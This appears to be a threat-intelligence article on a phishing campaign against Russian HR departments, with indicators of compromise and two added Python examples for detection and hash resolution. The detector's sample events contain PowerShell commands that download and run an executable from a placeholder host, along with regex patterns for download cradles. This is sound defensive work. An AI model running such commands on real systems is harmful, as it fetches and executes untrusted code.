A new, highly targeted espionage campaign dubbed Operation DUPEHIKE has been uncovered targeting corporate entities within the Russian Federation. Security researchers from the SEQRITE APT-Team have identified a sophisticated attack chain specifically aimed at Human Resources and payroll departments. The attackers are leveraging the promise of year-end financial rewards to breach corporate networks.
The attack begins with a classic spear-phishing email carrying a malicious ZIP archive. The file, named Премия 2025.zip (Bonus 2025.zip), is designed to be irresistible to employees expecting year-end compensation.
Inside the archive is not a legitimate document, but a malicious shortcut (LNK) file named Документ_1_0_размере_годовой_премии.pdf.lnk (Document_1_On_the_size_of_the_annual_bonus.pdf.lnk).

To further the deception, the attackers deploy a decoy document that perfectly mimics internal corporate policy. “The decoy document outlines the internal corporate rules for calculating an employee’s annual bonus, describing it as a performance-based incentive tied to KPIs, job responsibilities, and contribution to organizational goals.”
When a victim clicks the malicious shortcut, it triggers a stealthy infection sequence. “The only sole purpose of the LNK is just to download from a remote server and execute the malicious implant DUPERUNNER using a Windows Utility known as powershell.exe.”
The LNK script executes PowerShell with flags like -NoNl, -nop, and -w hidden to run the attack in the background. This script downloads a file named s.exe—the DUPERUNNER implant—from the attacker’s server at 46[.]149[.]71[.]230.
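The report names the PowerShell switches and the download-and-execute behaviour, which is enough to start hunting for this stage in process-creation telemetry. The Python below is an added example, not code from the report or from SEQRITE: it scores constructed Sysmon-style events (the 203.0.113.10 address and the paths are placeholders, not the campaign's indicators) on the hidden-window and no-profile switches, a download cradle, and an explorer.exe parent consistent with a clicked shortcut, and it includes a benign scheduled script that uses the same switches to show why the flags alone should not fire an alert.

```python
import ntpath
import re

# Constructed Sysmon-style process-creation events (key=value fields joined by
# "|"). Sample data for this example only: the 203.0.113.10 address and the
# file paths are placeholders, not indicators from the report.
SAMPLE_EVENTS = [
    # 1: user double-clicks a shortcut, explorer.exe spawns a hidden download cradle
    "ParentImage=C:\\Windows\\explorer.exe"
    "|Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "|CommandLine=powershell.exe -nop -w hidden -c \"(New-Object Net.WebClient)"
    ".DownloadFile('http://203.0.113.10/s.exe','C:\\Users\\Public\\s.exe');"
    " Start-Process C:\\Users\\Public\\s.exe\"",
    # 2: same behaviour with long-form switches and Invoke-WebRequest
    "ParentImage=C:\\Windows\\explorer.exe"
    "|Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "|CommandLine=powershell.exe -NoProfile -WindowStyle Hidden -Command"
    " \"Invoke-WebRequest http://203.0.113.10/s.exe -OutFile $env:TEMP\\s.exe\"",
    # 3: benign maintenance script launched by a scheduler with the same switches
    "ParentImage=C:\\Program Files\\Corp\\Scheduler.exe"
    "|Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "|CommandLine=powershell.exe -nop -w hidden -File C:\\Scripts\\rotate-logs.ps1",
    # 4: unrelated process, ignored
    "ParentImage=C:\\Windows\\explorer.exe"
    "|Image=C:\\Windows\\System32\\notepad.exe"
    "|CommandLine=notepad.exe report.txt",
]

# PowerShell accepts any unambiguous prefix of a switch, so match on prefixes,
# case-insensitively, rather than on exact spellings.
HIDDEN_WINDOW = re.compile(r"-w\w*\s+(?:hidden|1)\b", re.I)  # -w hidden, -WindowStyle Hidden
NO_PROFILE = re.compile(r"-nop\w*", re.I)                    # -nop, -NoProfile
DOWNLOAD_CRADLE = re.compile(
    r"Net\.WebClient|Download(?:File|String)|Invoke-WebRequest|\biwr\b"
    r"|Invoke-RestMethod|\birm\b|Start-BitsTransfer|https?://", re.I)
URL = re.compile(r"https?://[^\s'\"]+")
POWERSHELL_IMAGES = ("powershell.exe", "pwsh.exe")
USER_SHELL_PARENTS = ("explorer.exe",)  # parent consistent with a clicked LNK


def parse_event(line):
    """Split one key=value|key=value event into a dict."""
    fields = {}
    for part in line.split("|"):
        key, _, value = part.partition("=")
        fields[key.strip()] = value
    return fields


def score_event(event):
    """Return (score, reasons) for one parsed event; 0 for non-PowerShell images."""
    image = ntpath.basename(event.get("Image", "")).lower()
    if image not in POWERSHELL_IMAGES:
        return 0, []
    cmd = event.get("CommandLine", "")
    parent = ntpath.basename(event.get("ParentImage", "")).lower()
    checks = [
        (1, "hidden window", HIDDEN_WINDOW.search(cmd)),
        (1, "no profile", NO_PROFILE.search(cmd)),
        (2, "download cradle", DOWNLOAD_CRADLE.search(cmd)),
        (1, "spawned from user shell", parent in USER_SHELL_PARENTS),
    ]
    score = sum(weight for weight, _, hit in checks if hit)
    reasons = [label for _, label, hit in checks if hit]
    return score, reasons


def scan(lines, threshold=3):
    """Return findings for events at or above the threshold, with any URLs seen."""
    findings = []
    for index, line in enumerate(lines):
        event = parse_event(line)
        score, reasons = score_event(event)
        if score >= threshold:
            findings.append({
                "index": index, "score": score, "reasons": reasons,
                "urls": URL.findall(event.get("CommandLine", "")),
            })
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
```

The weighting is the point: the download cradle carries the most weight, and the explorer.exe parent adds the context of an interactive click, so the scheduler-launched script with identical switches stays below the threshold while both cradle variants are flagged with their download URL extracted for follow-up.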
DUPERUNNER capabilities:
- Stager Download: It downloads a secondary payload disguised as a font file (fontawesome.woff).
- Process Injection: It hunts for specific processes to inject malicious code into, specifically explorer.exe, notepad.exe, and msedge.exe.
- Persistence: It uses “classic Remote-Thread Injection where it allocates memory using VirtualAllocEx” to execute the final payload.
The ultimate goal of DUPERUNNER is to deploy the Adaptix C2 Beacon, an open-source command-and-control framework.
Once injected into a legitimate process, the beacon attempts to connect back to the threat actor’s infrastructure. “The malware walks the loaded module list and applies its custom, case-insensitive djb2-style hashing routine… to each module name until it finds a match for the target hash.” This lets the beacon resolve Windows APIs at run time without the module or function names appearing as plain strings, so static analysis tools that look for those names have nothing to match.
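The report quotes the behaviour but does not print the routine, so the exact variant (seed, add versus xor, which case fold, ASCII bytes versus UTF-16 code units) is an assumption here. The Python below is an added example, not SEQRITE's analysis code or the malware's: it hashes a constructed list of common module names under each plausible case-insensitive djb2 variant and maps a 32-bit hash constant pulled from disassembly back to candidate module names. It generalises past the single variant the text implies by trying several at once, which is what an analyst does when the routine's parameters are still being recovered; it also shows the detection angle, since the hashing hides the strings but the resulting constants become signatures once they are known.

```python
from itertools import product

# Constructed list of commonly loaded Windows modules; an analyst would extend
# it with whatever the sample is expected to touch.
KNOWN_MODULES = [
    "ntdll.dll", "kernel32.dll", "kernelbase.dll", "user32.dll",
    "advapi32.dll", "ws2_32.dll", "wininet.dll", "winhttp.dll",
]


def djb2_ci(name, fold="lower", op="add", wide=False, seed=5381):
    """Case-insensitive djb2-style hash (assumed variant, see lead-in).

    Classic djb2 is h = h * 33 + c (op="add"); djb2a uses h * 33 ^ c
    (op="xor"). 'fold' picks the case normalisation. 'wide' hashes each
    character as a UTF-16LE code unit (low byte then 0x00), because module
    names in the loader's module list are wide strings. 32-bit arithmetic.
    """
    h = seed
    folded = name.lower() if fold == "lower" else name.upper()
    for ch in folded:
        units = [ord(ch) & 0xFF, 0] if wide else [ord(ch) & 0xFF]
        for unit in units:
            h = (h * 33 + unit) if op == "add" else ((h * 33) ^ unit)
            h &= 0xFFFFFFFF
    return h


# Every combination of the unknown parameters; the sample's own routine will
# match exactly one of these once it has been read from the disassembly.
VARIANTS = [
    {"fold": fold, "op": op, "wide": wide}
    for fold, op, wide in product(("lower", "upper"), ("add", "xor"), (False, True))
]


def build_hash_table(names=KNOWN_MODULES, variants=VARIANTS):
    """Precompute hash -> [(module, variant), ...] for every name and variant."""
    table = {}
    for name in names:
        for variant in variants:
            table.setdefault(djb2_ci(name, **variant), []).append((name, variant))
    return table


def resolve(hash_value, table):
    """Map a 32-bit hash constant found in disassembly back to candidate names."""
    return table.get(hash_value & 0xFFFFFFFF, [])


if __name__ == "__main__":
    table = build_hash_table()
    # Constructed target: what the routine would produce for kernel32.dll under
    # the default variant; in practice the constant comes from the sample.
    target = djb2_ci("kernel32.dll")
    print(hex(target), resolve(target, table))
```

Because the table keeps the variant alongside the name, a hit also tells you which parameters the sample's routine uses, and a miss across all variants is a signal that the routine differs from textbook djb2 (a different seed or multiplier, or a different string source) rather than that the name is simply unknown.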
The campaign relies on distinct infrastructure for hosting payloads and command-and-control communication.
- Download Server: 46.149.71.230 (hosting the DUPERUNNER implant).
- C2 Server: 195.2.70.190 (hosting the Adaptix connection).
Researchers noted that the attackers may have made a configuration error or changed tactics during the campaign. “We believe that the TA had changed the configurations to port 443, to later use it as the server to host AdaptixC2.”